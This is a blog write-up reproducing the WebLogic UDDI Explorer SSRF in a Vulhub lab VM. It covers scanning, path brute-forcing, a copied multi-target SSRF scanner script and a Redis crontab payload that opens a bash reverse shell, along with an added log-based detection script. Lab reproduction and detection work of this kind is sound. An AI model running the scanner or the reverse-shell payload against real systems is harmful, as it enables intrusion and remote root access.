vulhub WebLogic SSRF vulnerability reproduction

Author: (nickname not shown due to a rule violation) | Source: published 2019-08-15 15:41, read 0 times

For the environment and background, see Vulhub.

Pretending I was just wandering around, I found a site at http://10.20.7.7.
OK, start with a full port scan, using my newly learned toy, netcat.

    root@Sanqiushu:~# nc -z -n -v 10.20.7.7 1-65535
    (UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
    (UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
    (UNKNOWN) [10.20.7.7] 22 (ssh) open
    ----------
    Grab the banner info
    root@Sanqiushu:~# echo "" | nc -n -v 10.20.7.7 1-65535
    (UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
    (UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
    (UNKNOWN) [10.20.7.7] 22 (ssh) open
    SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
    Protocol mismatch.
    ------------
    Compare with nmap
    root@Sanqiushu:~# nmap  10.20.7.7 -p 1-65535
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-15 15:09 CST
    Nmap scan report for 10.20.7.7
    Host is up (0.000077s latency).
    Not shown: 65532 closed ports
    PORT     STATE    SERVICE
    22/tcp   open     ssh
    4444/tcp filtered krb524
    7001/tcp open     afs3-callback
    MAC Address: 08:00:27:F1:8C:A9 (Oracle VirtualBox virtual NIC)
    
    Nmap done: 1 IP address (1 host up) scanned in 18.55 seconds
    

Found port 7001; let's open it in a browser.

Nothing of interest, so let's brute-force some paths.

    PS F:\SecTools\apps\dirsearch-master\dirsearch-master> ./dirsearch.py -u http://10.20.7.7:7001/ -e jsp
    
     _|. _ _  _  _  _ _|_    v0.3.8
    (_||| _) (/_(_|| (_| )
    
    Extensions: jsp | HTTP method: get | Threads: 10 | Wordlist size: 6074
    
    Error Log: F:\SecTools\apps\dirsearch-master\dirsearch-master\logs\errors-19-08-15_15-00-35.log
    
    Target: http://10.20.7.7:7001/
    
    [15:00:35] Starting:
    [15:00:41] 302 -  273B  - /bea_wls_internal  ->  http://10.20.7.7:7001/bea_wls_internal/
    [15:00:41] 200 -    0B  - /bea_wls_internal/HTTPClntRecv
    [15:00:41] 500 -    2KB - /beanManaged
    [15:00:41] 500 -    2KB - /bea_wls_internal/HTTPClntSend
    [15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientClose
    [15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientLogin
    [15:00:41] 200 -    0B  - /bea_wls_internal/iiop/ClientRecv
    [15:00:41] 500 -    2KB - /Bigdump.jsp
    [15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientSend
    [15:00:42] 200 -  416B  - /console
    [15:00:42] 200 -  418B  - /console/
    [15:00:42] 200 -  435B  - /console/base/config.json
    [15:00:42] 200 -  440B  - /console/payments/config.json
    [15:00:42] 200 -  437B  - /console/j_security_check
    [15:00:54] 302 -  265B  - /uddiexplorer  ->  http://10.20.7.7:7001/uddiexplorer/
    [15:00:54] 302 -  249B  - /uddi  ->  http://10.20.7.7:7001/uddi/
    [15:00:55] 200 -  855B  - /uddi/uddilistener
    
    Task Completed
    PS F:\SecTools\apps\dirsearch-master\dirsearch-master>
    

Quite a few paths turned up; let's visit them.

Found a UDDI Explorer.
This vulnerability affects WebLogic versions 10.0.2 through 10.3.6.
Annoyingly, the version can't be seen here,
so just test it directly.
Search for anything at random.
Intercept the request with Burp, right-click and send it to Repeater.
Change this to the test address.
The server returns 404, good.
Then probe the internal network services.
Script from https://www.jianshu.com/p/97b157a20108 (I haven't tried it).
Copied over:
    import re
    import queue
    import threading

    import requests
    from requests.packages.urllib3.exceptions import InsecureRequestWarning

    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    work_queue = queue.Queue()
    mutex = threading.Lock()


    class Test(threading.Thread):
        def __init__(self, queue):
            threading.Thread.__init__(self)
            self.queue = queue

        def check(self, domain, ip):
            # Point the UDDI Explorer's "operator" parameter at the registry
            # address; an XML_SoapException in the response means the server
            # fetched the URL itself, i.e. the SSRF is present.
            if ip is None:
                return
            payload = ("uddiexplorer/SearchPublicRegistries.jsp?operator={ip}"
                       "&rdoSearch=name&txtSearchname=sdf&txtSearchkey="
                       "&txtSearchfor=&selfor=Business+location"
                       "&btnSubmit=Search").format(ip=ip)
            url = domain + payload
            try:
                html = requests.get(url=url, timeout=15, verify=False).text
                m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException', html)
                if m:
                    with mutex:
                        with open('ssrf1.txt', 'a+') as f:
                            print("%s has weblogic ssrf." % domain)
                            f.write("%s has weblogic ssrf.\n" % domain)
            except Exception as e:
                print(e)

        def get_registry(self, domain):
            # The setup page prints an example registry URL; reuse its host as
            # the operator target.
            payload = 'uddiexplorer/SetupUDDIExplorer.jsp'
            url = domain + payload
            try:
                html = requests.get(url=url, timeout=15, verify=False).text
                m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>', html)
                if m:
                    return m.group(1)
            except Exception as e:
                print(e)
            return None

        def run(self):
            while True:
                try:
                    domain = self.queue.get_nowait()
                except queue.Empty:
                    return
                with mutex:
                    print(domain)
                ip = self.get_registry(domain)
                self.check(domain, ip)
                self.queue.task_done()


    if __name__ == '__main__':
        # One target per line, ending in "/", e.g. http://10.20.7.7:7001/
        with open('domain.txt', 'r') as f:
            lines = f.readlines()
        for line in lines:
            work_queue.put(line.strip())
        for x in range(1, 50):
            t = Test(work_queue)
            t.daemon = True
            t.start()
        work_queue.join()
    

Here I found a service on 6379 (how do you know what service that is?).
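From the server side, the probing above leaves a recognisable trail. As an added defender-side example (not part of the original post), this Python 3 script parses constructed Common-Log-Format access-log lines and flags sources that point the UDDI Explorer's `operator` parameter at private or loopback addresses; the log layout, source IPs, internal host and ports are assumed sample values.

```python
import re
import ipaddress
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines, not taken from the post: one source
# sweeps internal ports through the explorer's operator parameter, another
# source makes ordinary requests (a public registry lookup and the console).
SAMPLE_LOG = """\
10.20.2.185 - - [15/Aug/2019:15:20:01 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.18.0.2:6379&rdoSearch=name&txtSearchname=sdf&btnSubmit=Search HTTP/1.1" 200 1234
10.20.2.185 - - [15/Aug/2019:15:20:02 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.18.0.2:7001&rdoSearch=name&txtSearchname=sdf&btnSubmit=Search HTTP/1.1" 200 1234
10.20.2.185 - - [15/Aug/2019:15:20:03 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.18.0.2:22&rdoSearch=name&txtSearchname=sdf&btnSubmit=Search HTTP/1.1" 200 1234
10.20.2.190 - - [15/Aug/2019:15:21:00 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://uddi.example.com/inquiry&rdoSearch=name&txtSearchname=test&btnSubmit=Search HTTP/1.1" 200 1234
10.20.2.190 - - [15/Aug/2019:15:21:05 +0800] "GET /console/ HTTP/1.1" 200 418
"""

# Common Log Format: source IP, identd, user, [timestamp], "METHOD path PROTO", status
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" \d{3}')


def is_internal(host):
    """True for private/loopback IPs or 'localhost': targets the explorer should never reach."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return addr.is_private or addr.is_loopback


def parse_operator(path):
    """Return (host, port) from the operator parameter of a UDDI search request, else None."""
    u = urlparse(path)
    if not u.path.endswith("/uddiexplorer/SearchPublicRegistries.jsp"):
        return None
    ops = parse_qs(u.query).get("operator")
    if not ops:
        return None
    target = urlparse(ops[0])
    return (target.hostname, target.port) if target.hostname else None


def find_ssrf_probes(log_text):
    """Map each source IP to the sorted internal (host, port) targets it aimed the explorer at."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = parse_operator(m.group("path"))
        if target and is_internal(target[0]):
            hits[m.group("src")].add(target)
    # Several distinct ports from one source is the port sweep the script above performs.
    return {src: sorted(targets) for src, targets in hits.items()}
```

A request to a public registry host is left alone; only operator targets resolving to internal address space are reported, grouped by the requesting client.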

Just fire the Redis payload at it.



After a good while, the listening machine receives the connection.

    root@Sanqiushu:~# nc -lvp 4444
    listening on [any] 4444 ...
    10.20.7.7: inverse host lookup failed: Unknown host
    connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 45976
    bash: no job control in this shell
    [root@31607ec8723e ~]# ls
    ls
    anaconda-ks.cfg
    install.log
    install.log.syslog
    [root@31607ec8723e ~]# ls
    ls
    anaconda-ks.cfg
    install.log
    install.log.syslog
    [root@31607ec8723e ~]# 
    

The payload originally looked like this:

    test
    
    set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/10.20.7.7/4444 0>&1\n\n\n\n"
    config set dir /etc/
    config set dbfilename crontab
    save
    
    aaa
    

It was URL-encoded when sent; with POST that apparently isn't really necessary.

Article link: https://www.haomeiwen.com/subject/xnezjctx.html